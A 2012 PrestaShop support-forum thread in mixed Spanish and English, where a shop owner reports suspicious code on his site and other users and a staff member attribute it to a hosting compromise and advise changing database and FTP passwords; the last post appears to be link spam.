I think it is not prestashop problem is the problem of security of your hosting.

 

Sorry for my English

 

 

said to be hosting my hosting problem prestashop

 

please prestashop many problems with this code in Spain necesimos professional help prestashop

Edited July 18, 2012 by elitemfitness (see edit history)

[nadie]

said to be hosting my hosting problem prestashop

 

please prestashop many problems with this code in Spain necesimos professional help prestashop

 

Check: http://wmaraci.com/f...rdim-44290.html (It's the same code, but with another manager called wordpress)

 

 

So I do not think is a problem of prestashop ..

 

 

 

Sorry for my English

[nadie]

Well, let's hope that Mike says. (He will have more details)

 

Sorry for my English

[jajajaja@]

nadie soy español posteo aqui por que quiero que esto llegue a la central de prestashop yo como de esto y tengo que solucionarlo como sea agradezco tu ayuda por el foro en español un saludo

[nadie]

nadie soy español posteo aqui por que quiero que esto llegue a la central de prestashop yo como de esto y tengo que solucionarlo como sea agradezco tu ayuda por el foro en español un saludo

 

 

I can not give more indications of which you have been given here:

 

http://www.prestasho...les-prestashop/

 

 

In Spanish:

 

Yo no puedo darte mas detalles de los que se te han dado aqui:

 

 

http://www.prestasho...les-prestashop/

 

Sorry for my english

[Mike Kranzler]

Hi elitemfitness,

I had our developers double-check it for me, and nadie is correct, that code has nothing to do with PrestaShop. This is an issue with your hosting provider. I would suggest that you change your database and FTP passwords, and then contact your host to resolve it.

 

-Mike

[jajajaja@]

Hi elitemfitness,

I had our developers double-check it for me, and nadie is correct, that code has nothing to do with PrestaShop. This is an issue with your hosting provider. I would suggest that you change your database and FTP passwords, and then contact your host to resolve it.

 

-Mike

 

hello nadie is our work is very highly regarded in Spain thank you very much for your help

Edited July 18, 2012 by elitemfitness (see edit history)

[sandvicpanel]

And were these versions previously upgraded from earlier releases, or downloaded and installed in their current forms like this site http://www.sandvicpanelfiyati.com/ ? vplease prestashop many problems with this code in Spain necesimos professional help prestashop